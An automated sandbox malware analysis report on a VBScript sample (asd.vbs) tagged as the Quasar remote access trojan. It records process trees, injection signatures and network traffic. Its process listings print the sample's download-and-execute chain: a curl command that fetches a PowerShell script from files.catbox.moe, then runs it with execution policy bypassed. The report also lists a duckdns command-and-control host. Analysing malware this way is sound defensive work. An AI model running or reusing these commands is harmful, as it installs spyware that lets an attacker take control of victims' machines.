Malware Analysis Report

2025-04-14 05:07

Sample ID 230116-llw4zada92
Target asd.vbs
SHA256 7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba
Tags
quasar office04 spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba

Threat Level: Known bad

The file asd.vbs was found to be: Known bad.

Malicious Activity Summary

quasar office04 spyware trojan

Quasar RAT

Quasar payload

Checks computer location settings

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-16 09:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-16 09:37

Reported

2023-01-16 09:40

Platform

win7-20221111-en

Max time kernel

30s

Max time network

33s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 532 wrote to memory of 272 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 272 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 272 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 272 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 272 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 272 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1820 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 1820 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 1820 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1820 wrote to memory of 772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 772 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 772 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 772 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 772 wrote to memory of 1616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

Network

N/A

Files

memory/532-54-0x000007FEFC191000-0x000007FEFC193000-memory.dmp

memory/272-55-0x0000000000000000-mapping.dmp

memory/764-56-0x0000000000000000-mapping.dmp

memory/1820-57-0x0000000000000000-mapping.dmp

memory/772-58-0x0000000000000000-mapping.dmp

memory/1616-59-0x0000000000000000-mapping.dmp

memory/1616-61-0x000007FEF4170000-0x000007FEF4B93000-memory.dmp

memory/1616-62-0x000007FEF3610000-0x000007FEF416D000-memory.dmp

memory/1616-63-0x00000000023C4000-0x00000000023C7000-memory.dmp

memory/1616-64-0x00000000023C4000-0x00000000023C7000-memory.dmp

memory/1616-65-0x00000000023CB000-0x00000000023EA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-16 09:37

Reported

2023-01-16 09:40

Platform

win10v2004-20220901-en

Max time kernel

36s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3384 set thread context of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 4624 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4956 wrote to memory of 4624 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4624 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4624 wrote to memory of 2460 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2460 wrote to memory of 628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2460 wrote to memory of 628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4956 wrote to memory of 2256 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4956 wrote to memory of 2256 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2256 wrote to memory of 5092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2256 wrote to memory of 5092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 5092 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5092 wrote to memory of 3384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3384 wrote to memory of 1128 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\curl.exe

curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\system32\cmd.exe

cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 files.catbox.moe udp
N/A 107.160.74.134:443 files.catbox.moe tcp
N/A 8.8.8.8:53 ghcc.duckdns.org udp
N/A 95.216.102.32:4782 ghcc.duckdns.org tcp
N/A 8.8.8.8:53 tools.keycdn.com udp
N/A 185.172.148.96:443 tools.keycdn.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 64.185.227.155:443 api.ipify.org tcp
N/A 20.189.173.12:443 tcp
N/A 8.8.8.8:53 96.108.152.52.in-addr.arpa udp
N/A 8.8.8.8:53 d.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.5.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa udp

Files

memory/4624-132-0x0000000000000000-mapping.dmp

memory/2460-133-0x0000000000000000-mapping.dmp

memory/628-134-0x0000000000000000-mapping.dmp

memory/2256-135-0x0000000000000000-mapping.dmp

memory/5092-136-0x0000000000000000-mapping.dmp

memory/3384-137-0x0000000000000000-mapping.dmp

memory/3384-138-0x0000019ECFD30000-0x0000019ECFD52000-memory.dmp

C:\Users\Admin\AppData\Roaming\rr.ps1

MD5 7aad8bcb11ff3deab23cc311222fe265
SHA1 3d9a69c71e00aff947af949441220f18bad9e0d8
SHA256 c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512 f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9

memory/3384-140-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

memory/1128-141-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1128-142-0x000000000047E7AE-mapping.dmp

memory/3384-143-0x00007FFC46E80000-0x00007FFC47941000-memory.dmp

memory/1128-144-0x0000000005B50000-0x00000000060F4000-memory.dmp

memory/1128-145-0x00000000055A0000-0x0000000005632000-memory.dmp

memory/1128-146-0x0000000005500000-0x000000000550A000-memory.dmp

memory/1128-147-0x0000000006820000-0x0000000006E38000-memory.dmp

memory/1128-148-0x0000000006250000-0x00000000062A0000-memory.dmp

memory/1128-149-0x0000000006480000-0x0000000006532000-memory.dmp

memory/1128-150-0x0000000007820000-0x0000000007886000-memory.dmp